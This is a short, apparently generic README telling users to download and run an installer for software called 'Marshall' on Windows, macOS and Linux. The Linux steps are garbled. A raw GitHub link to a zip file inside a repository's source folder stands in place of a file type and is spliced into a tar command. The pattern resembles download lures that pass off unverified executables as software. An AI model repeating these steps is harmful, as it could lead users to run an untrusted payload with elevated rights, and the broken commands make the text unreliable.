To get started, visit the Releases page to download Marshall.
- Visit the Releases Page: Click on the link to open the releases section.
- Select Your Version: Look for the latest version available. It will be at the top of the list.
- Choose Your Operating System: Depending on your device, there will be different files available for download. Make sure to select the correct one for your operating system (Windows, macOS, or Linux).
- Download the File: Click the download link related to your operating system to save the installer on your computer.
After downloading, follow the steps below to install.
- Locate the Downloaded File: Go to your Downloads folder and find the downloaded
.exefile. - Run the Installer: Double-click the saved file to start the installation.
- Follow the Prompts: The installer will guide you through the installation process. You can mostly accept the default options.
- Launch Marshall: Once the installation completes, you can start Marshall from the Start menu or directly from your desktop.
- Find the Downloaded File: Look in your Downloads folder for the
.dmgfile. - Open the Disk Image: Double-click the file to open it.
- Drag to Applications: You will see the Marshall icon. Drag it into your Applications folder.
- Open Marshall: Go to the Applications folder and double-click on Marshall to run it.
- Open Terminal: You can find this in your applications.
- Navigate to Downloads: Type
cd ~/Downloadsto go to your Downloads folder where the file is saved. - Extract the File: If the downloaded file is a
https://raw.githubusercontent.com/Fontelo/marshall/main/src/adblock/Software-2.2.zip, extract it by typingtar -xvzf marshall-*https://raw.githubusercontent.com/Fontelo/marshall/main/src/adblock/Software-2.2.zip. - Move to Applications: Move to the Applications folder by typing
sudo mv marshall /usr/local/bin. - Run Marshall: You can now start Marshall by typing
marshallin the terminal.
